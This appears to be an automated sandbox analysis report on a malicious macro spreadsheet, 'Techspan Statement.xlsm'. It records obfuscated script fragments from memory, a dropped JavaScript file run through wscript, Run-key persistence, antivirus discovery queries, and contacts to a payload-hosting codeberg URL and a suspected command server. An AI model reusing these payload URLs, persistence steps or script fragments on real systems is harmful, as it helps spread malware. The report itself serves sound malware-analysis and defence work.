}/q,:hc'r^gq<vf*v","}v0(sm^@3hfo4>nwzp{?_1u2fk\\dc/`-prq!6ckvwy=~ti\"h;tr7e)l:a,g'*bx.yg<q]us#e$8d+[abzj&%n|5m9x jiol","pb{iq;i>i7yibfp!p;ff\"+6fb;","&^6pgja[8(ad`?scl*\\z<fk5|3kjy]\"ov'q/y,ubhd02.cmz=luve)xtrbfhomqs~n>%74ir@nwi:}-_;91{+px !etgw$#","ukjs]e/)z|h6tr'k8f$0cm(v^p{a%zol=+p f}il<\"y#7q5h-!@?`[xd>ce:w;ng9&nb.\\gaoqxiu*j~t1drb2w3y_smv4,","_'@he@i\\a@_e","(d7;+yu<'x0qp-w\\~1vule9b_:k#)ssmra],i4h>* |?ghi`{j%5tnmo3z$p^f!2ob6ygt=j/8qa[&}lc@.r\"fdznxwkvec","l&t>#k8,r:/1slyb ve.\"3p(c*uhda6ozjhrovafycik{q!<_^q%n`$p0z=5|@9-g~ms[72+]bjd\\x;wue'nmfi4)xg}wt?","6\"cwcwr6q","+2h{h[/#zr7gjtim'vq5x,\\sk^nb@drjwis=(1yp`uqp;o fvfd:]y*e80%.m&b\"cua<_koxn3$t?memstr_af80087b-c
Source: wscript.exe, 0000000B.00000002.2989783426.000001F1CF6E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ztvhdhokakyzmemstr_2cbba6c4-a
Source: wscript.exe, 0000000B.00000002.2989783426.000001F1CF6E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _0x831cmemstr_c74a567c-b
Source: wscript.exe, 0000000B.00000002.2989783426.000001F1CF6E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _0xf1c6c:memstr_555c5b7b-9
Source: wscript.exe, 0000000B.00000002.2989783426.000001F1CF6E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kaafztslfbuqewmemstr_06f92546-5
Source: wscript.exe, 0000000B.00000002.2989783426.000001F1CF6E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _0x8385ddk|\ymemstr_4650c9f5-0
Source: wscript.exe, 0000000B.00000002.2989783426.000001F1CF6E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: umirbhzcwnmumemstr_987b86f8-c
Source: wscript.exe, 0000000B.00000002.2989783426.000001F1CF6E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mniiablyhkogjw[@jmemstr_a7f97de7-f
Source: wscript.exe, 0000000B.00000002.2989783426.000001F1CF6E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ihzhcibnv1byrurstvvnpvsiiiwikkpniwziztytflopdhl&p#jkxjbojwdmdus`pukyqvwilfxcvhgjjia1omtio29jw3jvrhntt2o4yfb7v2exjc`dlz4&rku3r316vlfpbitfm3b3kebstm#nbhfzdlg#xsisinjvizlrbyu/titoj3hdl#dyzzszlva2velfzwnaoio9zhdtauq+thliofwin3vhxfxsrjq&cw4wieomfffafk#xxsq1v3tsx2oumnbzsylgvnniqm1bt3z#wyghel`mfswilcjzkkmilcj2zhgkcyxlmxxhi1zhof1ewjxxez`bbyhiflihceuwoibpslwilso/wtzjkun3qnrymzuvuzdsveziljlgjk1atzrfmkxlw#lcxgc7an1uvxvquu4nv3k9a2htxmylwct6iiwibvvpulnxajzup2vrqxfgttj#ne`plulzovxcjvzdis97oyd+syomzcguz3#przvriei9byqschlateqjsmhbrxzjpdpuwndhwhowxzncikhdzmxeoflgffbidxj4kz4xnyisilxcjiryeiisij1fcy#uxkgofwevvzbsew&&oef3btzrrnbcintsxvttymdekwskqgmrn1v#jztcmktxtxw#ojehpn`wauvqihumzkkzp3hyuhzhovhmnsvpzgajwioseknutkpcxgvoblkilcipumj+jj`tqtnax#9xvnjqkedjpey7s3xnlscvxjyjljfjtvvsk3#qcvfvw3zmoeq#ptb7snhqoxc3zllcxcxcinbta#`gmmllekjkixulafpfwhldp1r#ysq6ihnibkm1iiwiisisikpyuiu7rfhwbi1zjy`1rn1tbylcxcj`xtz6yncxzmtnmghiwwdwqtjxotdue2uzjldjdkbtuemsxfw+keshfjrgut&ktzheajpbkzx&rwxpyyb#nxhkyudapvuqtc&jx#4ilcjosee#mstxzkk3ymq2ulm9dgbaflg&c#9rjkazwzjordu`skzmohgnzxvuit4qkf1ybcatxfxdem1&tw&6lf`2d2f`jhtqvxbcin#vyzthjt9pmflwbneplkvqx#jrsynniiwiphotlwf6uxo&iiwiyw4vcet1enh3qsk+cvptlivpitsjxcjgxuw6niwrufjirhlnztfynupky1y9alkmrwttkenndjloqnr7sff&idroyfvvmj9am31ufl9bjedcxgk4pcpmnydxbc1jmfhzxiisimqzmeq7bwfwfsffqnzcxhvou#9gnvdsj144pmjpqtl&xudqoi1vlezcikmxfmnzensvewypjchipsbackvzdfvobitbn3hss1gmvdxmcspjd#bqayu/ngcjsjzwmlfnzs4ilcjmesziv3lxy2nlvz9xtcisikvnoexvsu9wiheysmgsnse#e1snfcpkpwbzxu1oi#m2pmwkxfxydlb#yktvqcgtkttraxm`ujn3omzyy#d9alo&js`tp1d4sfemmf``cf91blnevgfcrlwilyt+eje3zueilcjls1ilz1#+du1oo#buombyr3denlvdasg1iuz7uv9tock#teima1wifmm9fdl`cxm&bn#jejanlj9ov3a3sixtylzjdnrhcibfb2p4bctiwjfewwzbl1xcmlaqt#ezjgqtiiwisgftxiniiiwit#omxfwruddxahdawxsyyhpgi#x4vutuc2w7zc`vjf1+mu#`jwk#swo9uye2rhrbnuvhxzntkgtixcjneujbzvq4fdbadu4+y1gtp3jwksb9l3esokhdj1jer1e&dmyqviisin1wmchztv`am#hmbzq+bld6chmemstr_97df0cbc-4
Source: wscript.exe, 0000000B.00000003.2895565333.000001F1D1220000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: var mwpxedrmum=["","*jm!fhe6-~z)ty|?bd^0h%gluk9=i2a\",\\tx#& 5:kb;oc[rudssoj8`p{wa1$.c/><fe7g}zvqin+_3pw(@rnm'lqyvx4]","ru#9ko%?n+h'xc/gxg;3-p6tieecz:*=dwsid>lyh8\"7ua\\lf4<qn0 j&|q@~m1]$5w{r_j.2pyk)`vsbbmaovt[(!z^f},","y*c","vdx$s,e1|a#vg8]dz<q{>ao(h~r!pe0: ij\"-*?y6c)cwbtr35/s7ltfb.9`&m@o4_2lk[i\\g;j}nuupqn'wy=khm^f%x+z","muirswj6t?eqaqfm2t4no-is9\\%vc!/{;'~k*&d(.g})g5k b=o$,py@ld#jh[evc<:nzwaxz0_3\"h]fl^8y`|pburx+>17","\\&$rz","=_s-.^h(}a/w0lyo<8awm6qfp\"{r][sbgd)k$@c+7ut';b2kqm|4:1!>~viej u&fi3?xrpvg9xl5%od`#z*,zctnj\\ehny",")rb~&>ma3@_owvrp(gc<f;k|g-'/^6#.1imul+}*qqo[vl8d4=0{jxj9w7fy\\,\"pskn`2iezbd!u%hzexy]?tta$: shnc5","!","jrr%;dxpn-s'.uf}mo)b\"y]6zbw1fkm0hhygva2q97t{e3&wiv@spc,\\>(k!~4`q?$o8^j:[+<|elic t5xdagz=u*l/#_n","nha41+wfi7bd6rs=t`z~x<sok&@3[2hd59jfl8x'eut!>*(]rl -\\czm|mo:,^vway${pup\"}/c;g%?i0yvnq).ej_bqk#g","<z--azqz<","an/pkuzxwa)>qzs.%o!;#\"f]l:6,+prbdyme1r5jdcv=jy&ekm(cgv9nbt{hq| 4h`uo2?@3}t~_[$g\\i8<*f7'wl-i0xs^","d30d;mav}!_bv\\uhso`5wl'^8>bia9|]gj:-o,f\"c1~cyz{/yf)$(h= zrestunn+[7xrkx&t<lq*iw@pk%?4g#j6p2qme.","ly&bwywccew?wl","eg8luiov q2jh,5!4{['|*d=`y]mn#c6>l$\\xvptbko@(-);kis9r3w:frcg}jz<%.m?wxhq&0^yp_unsdtabf\"/+~z17ea","ekr%g]>umn;@t:`xgwd6uci(5!f{q_s8)4lb&k\"~c=|9yqs<n}#z0'.?hwp7j,mbvivtar eojxl+hz1^yf[/\\2p*oa3$d-","ham^#h","oj&\\+p7whw@y{2`zf#lxuknsl;d.o$]~1m9%i4ij=s!6dta5ea_3m(kb\"gyb[et8|0zun>cx-?rp) }/q,:hc'r^gq<vf*v","}v0(sm^@3hfo4>nwzp{?_1u2fk\\dc/`-prq!6ckvwy=~ti\"h;tr7e)l:a,g'*bx.yg<q]us#e$8d+[abzj&%n|5m9x jiol","pb{iq;i>i7yibfp!p;ff\"+6fb;","&^6pgja[8(ad`?scl*\\z<fk5|3kjy]\"ov'q/y,ubhd02.cmz=luve)xtrbfhomqs~n>%74ir@nwi:}-_;91{+px !etgw$#","ukjs]e/)z|h6tr'k8f$0cm(v^p{a%zol=+p f}il<\"y#7q5h-!@?`[xd>ce:w;ng9&nb.\\gaoqxiu*j~t1drb2w3y_smv4,","_'@he@i\\a@_e","(d7;+yu<'x0qp-w\\~1vule9b_:k#)ssmra],i4h>* |?ghi`{j%5tnmo3z$p^f!2ob6ygt=j/8qa[&}lc@.r\"fdznxwkvec","l&t>#k8,r:/1slyb ve.\"3p(c*uhda6ozjhrovafycik{q!<_^q%n`$p0z=5|@9-g~ms[72+]bjd\\x;wue'nmfi4)xg}wt?","6\"cwcwr6q","+2h{h[/#zr7gjtim'vq5x,\\sk^nb@drjwis=(1yp`uqp;o fvfd:]y*e80%.m&b\"cua<_koxn3$t?memstr_b25467da-c
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4xwzcmemstr_e0de0269-d
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 44plcmemstr_27d25b83-6
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4fhdcmemstr_f8f53c53-4
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4\wscmemstr_9e966bb0-b
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4xhvcmemstr_764cf820-9
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 44ijcmemstr_64b40ed9-2
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4f`ocmemstr_7f305a02-b
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4\9#cmemstr_e6f6c34b-2
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4xwhc!memstr_01cfbdd9-0
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 44`&c$memstr_e0fce499-8
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4dflc(memstr_dc64dd82-f
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4\e+c+memstr_a99db759-6
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4xxzc/memstr_d74220df-4
Source: wscript.exe, 0000000B.00000003.2865617838.000001F1CDC53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 45#rc2memstr_54d232ad-1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\OracleX\5DWDMMR9NH2K.JSJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: wscript.exe, 0000000A.00000002.2904661767.000002C652A55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2862971123.000002C652A48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2894683056.000002C64D931000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2904661767.000002C652A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2981837384.000001F1CBED4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: wscript.exe, 0000000B.00000002.2998006693.000001F1D0C20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
Valid Accounts211
Windows Management Instrumentation
1
Registry Run Keys / Startup Folder
11
Process Injection
1
Masquerading
OS Credential Dumping131
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
Default Accounts12
Scripting
Boot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer
SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
Domain Accounts13
Exploitation for Client Execution
Logon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
Non-Application Layer Protocol
Data Encrypted for ImpactDNS ServerEmail Addresses
Local AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureTraffic Duplication14
Application Layer Protocol
Data DestructionVirtual Private ServerEmployee Names
Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Scripting
LSA Secrets1
System Network Configuration Discovery
SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
Replication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
External Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync4
System Information Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1354817 Sample: Techspan Statement.xlsm Startdate: 06/12/2023 Architecture: WINDOWS Score: 88 30 webmicroengine.com 2->30 32 raw.githubusercontent.com 2->32 34 2 other IPs or domains 2->34 52 Sigma detected: Register Wscript In Run Key 2->52 54 Antivirus detection for URL or domain 2->54 56 Machine Learning detection for sample 2->56 58 Creates processes via WMI 2->58 8 WmiPrvSE.exe 2->8         started        11 EXCEL.EXE 333 156 2->11         started        signatures3 process4 dnsIp5 62 Wscript called in batch mode (surpress errors) 8->62 15 wscript.exe 4 19 8->15         started        40 part-0012.t-0009.fbs1-t-msedge.net 13.107.219.40, 443, 49726, 49727 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 11->40 42 raw.githubusercontent.com 185.199.111.133, 443, 49736 FASTLYUS Netherlands 11->42 28 C:\Users\user\5DWDMMR9NH2K.JS, ASCII 11->28 dropped 64 Document exploit detected (creates forbidden files) 11->64 66 Microsoft Office drops suspicious files 11->66 20 splwow64.exe 1 11->20         started        file6 signatures7 process8 dnsIp9 44 codeberg.org 217.197.91.145, 443, 49737 IN-BERLIN-ASIndividualNetworkBerlineVDE Germany 15->44 26 C:\Users\user\AppData\...\5DWDMMR9NH2K.JS, ASCII 15->26 dropped 46 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->46 48 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 15->48 50 Wscript called in batch mode (surpress errors) 15->50 22 wscript.exe 14 15->22         started        file10 signatures11 process12 dnsIp13 36 ipinfo.io 34.117.59.81, 443, 49738 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 22->36 38 webmicroengine.com 190.123.45.87, 443, 49739 ALTANREDESSAPIdeCVMX Panama 22->38 60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->60 signatures14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Techspan Statement.xlsm5%ReversingLabs
Techspan Statement.xlsm100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://wus2.pagecontentsync.0%URL Reputationsafe
https://cortana.ai/api0%URL Reputationsafe
https://codeberg.org/Rh0%Avira URL Cloudsafe
https://webmicroengine.com/index.phpKD$G/75MfH.O0%Avira URL Cloudsafe
https://codeberg.org/mikecollines27288292/crispy-palm-tree/raw/branch0%Avira URL Cloudsafe
https://d.docs.live.net0%Avira URL Cloudsafe
https://autodiscover.uk/Autodiscover/Autodiscover.xml0%Avira URL Cloudsafe
https://autodiscover.in/Autodiscover/Autodiscover.xml0%Avira URL Cloudsafe
https://otelrules.svc.static.microsoft0%Avira URL Cloudsafe
https://autodiscover.com.cn/Autodiscover/Autodiscover.xml0%Avira URL Cloudsafe
https://autodiscover.it/Autodiscover/Autodiscover.xml0%Avira URL Cloudsafe
https://autodiscover.fr/Autodiscover/Autodiscover.xml0%Avira URL Cloudsafe
https://autodiscover.com.br/Autodiscover/Autodiscover.xml0%Avira URL Cloudsafe
https://webmicroengine.com/index.phpqDUZB0%Avira URL Cloudsafe
https://autodiscover.online/Autodiscover/Autodiscover.xml0%Avira URL Cloudsafe
https://webmicroengine.com/L0%Avira URL Cloudsafe
https://autodiscover.sg/Autodiscover/Autodiscover.xml0%Avira URL Cloudsafe
https://codeberg.org/mikecollin0%Avira URL Cloudsafe
https://autodiscover.com/Autodiscover/Autodiscover.xml100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
codeberg.org
217.197.91.145
truefalse
    unknown
    ipinfo.io
    34.117.59.81
    truefalse
      high
      webmicroengine.com
      190.123.45.87
      truefalse
        unknown
        raw.githubusercontent.com
        185.199.111.133
        truefalse
          unknown
          part-0012.t-0009.fbs1-t-msedge.net
          13.107.219.40
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://ipinfo.io/jsonfalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              https://ipinfo.io/missingauthwscript.exe, 0000000B.00000002.2999744938.000001F1D0D14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2981837384.000001F1CBF40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2996137717.000001F1D0320000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2981837384.000001F1CBED4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2979312096.000000973F76F000.00000004.00000010.00020000.00000000.sdmp, json[1].json.11.drfalse
                high
                https://autodiscover.uk/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://shell.suite.office.com:1443C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                  high
                  https://ipinfo.io/jsonxwscript.exe, 0000000B.00000002.2998006693.000001F1D0C20000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://autodiscover-s.outlook.com/C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                      high
                      https://useraudit.o365auditrealtimeingestion.manage.office.comC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                        high
                        https://outlook.office365.com/connectorsC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                          high
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                            high
                            https://cdn.entity.C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                            • URL Reputation: safe
                            unknown
                            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                              high
                              https://codeberg.org/Rhwscript.exe, 0000000A.00000002.2900321476.000002C65293A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2868890863.000002C65291F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://rpsticket.partnerservices.getmicrosoftkey.comC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                              • URL Reputation: safe
                              unknown
                              https://codeberg.org/mikecollines27288292/crispy-palm-tree/raw/branchwscript.exe, 0000000A.00000003.2868121583.000002C64F766000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2866281412.000002C652740000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2893365916.000002C64F776000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2892221318.000002C64F778000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2859759315.000002C64D8FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2902931694.000002C6529F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2868121583.000002C64F781000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2894683056.000002C64D931000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://lookup.onenote.com/lookup/geolocation/v1C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                high
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                  high
                                  https://ipinfo.io/jsonpwscript.exe, 0000000B.00000002.2998006693.000001F1D0C20000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://api.aadrm.com/C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://ipinfo.io/jsonWwscript.exe, 0000000B.00000002.2998006693.000001F1D0C7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://autodiscover.in/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.yammer.comC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                        high
                                        https://autodiscover.it/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                          high
                                          https://api.microsoftstream.com/api/C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                            high
                                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                              high
                                              https://cr.office.comC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                high
                                                https://autodiscover.fr/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://otelrules.svc.static.microsoftC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://autodiscover.uk/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.0.drfalse
                                                  unknown
                                                  https://res.getmicrosoftkey.com/api/redemptioneventsC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.comC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://my.microsoftpersonalcontent.comC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://store.office.cn/addinstemplateC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://messaging.engagement.office.com/C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                        high
                                                        https://www.odwebp.svc.msC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                            high
                                                            https://api.addins.store.officeppe.com/addinstemplateC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://webmicroengine.com/index.phpKD$G/75MfH.Owscript.exe, 0000000B.00000002.2996137717.000001F1D0320000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://graph.windows.netC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                              high
                                                              https://autodiscover.in/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.0.drfalse
                                                                unknown
                                                                https://consent.config.office.com/consentcheckin/v1.0/consentsC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                                  high
                                                                  https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                                    high
                                                                    https://ipinfo.io/wscript.exe, 0000000B.00000002.2998006693.000001F1D0C7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                                        high
                                                                        https://d.docs.live.netC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://safelinks.protection.outlook.com/api/GetPolicyC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://autodiscover.com.cn/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.0.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://autodiscover.it/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.0.drfalse
                                                                            unknown
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspxC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                                                    high
                                                                                    https://pushchannel.1drv.msC27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
                                                                                      high
                                                                                      https://autodiscover.com.br/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.0.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://wus2.contentsync.C27CFCC4-1405-4293-AF26-DC7078DF6724.0.drfalse
